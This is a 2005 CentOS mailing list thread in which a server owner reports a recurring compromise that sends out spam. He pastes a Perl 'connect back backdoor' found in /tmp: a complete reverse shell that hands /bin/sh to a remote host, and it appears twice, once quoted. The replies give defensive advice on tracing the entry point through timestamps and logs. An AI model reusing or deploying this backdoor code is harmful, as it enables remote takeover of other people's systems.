I have a personal apache/mail server that is getting hacked and I'm not
sure how the person is getting in. What's happening is that every few
days, the below script will show up in /tmp as 'dc.txt', owned by apache
and then a TON of mail is queued up to a bunch of addresses in
@uol.com.br.
I initially thought they got in becuase I had an outdated version of
'gallery' installed. I rebuild the server and update gallery and
thought I should be okay. But now they are still getting in and instead
of blindly rebuilding the server, I need to figure out how they are able
to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
---------------------------
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket
Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
--------------------------------
A bit of simple Googling should point you in the right direction... http://vil.nai.com/vil/content/v_129568.htm http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&btnG=Google+Search&meta Are you running Twiki open to the internet? http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html Will. On 30/11/05, Ajay Sharma <ssharma at revsharecorp.com> wrote:> > I have a personal apache/mail server that is getting hacked and I'm not > sure how the person is getting in. What's happening is that every few > days, the below script will show up in /tmp as 'dc.txt', owned by apache > and then a TON of mail is queued up to a bunch of addresses in > @uol.com.br. > > I initially thought they got in becuase I had an outdated version of > 'gallery' installed. I rebuild the server and update gallery and > thought I should be okay. But now they are still getting in and instead > of blindly rebuilding the server, I need to figure out how they are able > to run perl scripts on the server. > > Any suggestions? > > --Ajay > > PS. This is a CentOS 4.2 box running the latest apache/php RPMS. > > --------------------------- > #!/usr/bin/perl > use Socket; > print "Data Cha0s Connect Back Backdoor\n\n"; > if (!$ARGV[0]) { > printf "Usage: $0 [Host] <Port>\n"; > exit(1); > } > print "[*] Dumping Arguments\n"; > $host = $ARGV[0]; > $port = 80; > if ($ARGV[1]) { > $port = $ARGV[1]; > } > print "[*] Connecting...\n"; > $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); > socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); > my $target = inet_aton($host); > if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { > die("Unable to Connect\n"); > } > print "[*] Spawning Shell\n"; > if (!fork( )) { > open(STDIN,">&SERVER"); > open(STDOUT,">&SERVER"); > open(STDERR,">&SERVER"); > exec {'/bin/sh'} '-bash' . "\0" x 4; > exit(0); > } > print "[*] Datached\n\n"; > -------------------------------- > _______________________________________________ > CentOS mailing list > CentOS at centos.org > http://lists.centos.org/mailman/listinfo/centos >
Ajay Sharma wrote:> > I have a personal apache/mail server that is getting hacked and I'm > not sure how the person is getting in. What's happening is that every > few days, the below script will show up in /tmp as 'dc.txt', owned by > apache and then a TON of mail is queued up to a bunch of addresses in > @uol.com.br. > > I initially thought they got in becuase I had an outdated version of > 'gallery' installed. I rebuild the server and update gallery and > thought I should be okay. But now they are still getting in and > instead of blindly rebuilding the server, I need to figure out how > they are able to run perl scripts on the server. > > Any suggestions? > > --Ajay > > PS. This is a CentOS 4.2 box running the latest apache/php RPMS. >I had someone do the same thing on a colocated box I have. Turns out I had an old version of PHPix (also a photo gallery) which someone was able to exploit. I discovered it by looking at the timestamp of the file(s) in /tmp (or /var/tmp in my case), and the start time for the processes (other than httpd) that were running as the "apache" user. Then, looking at the apache access_log, it was obvious which script was being exploited... -Greg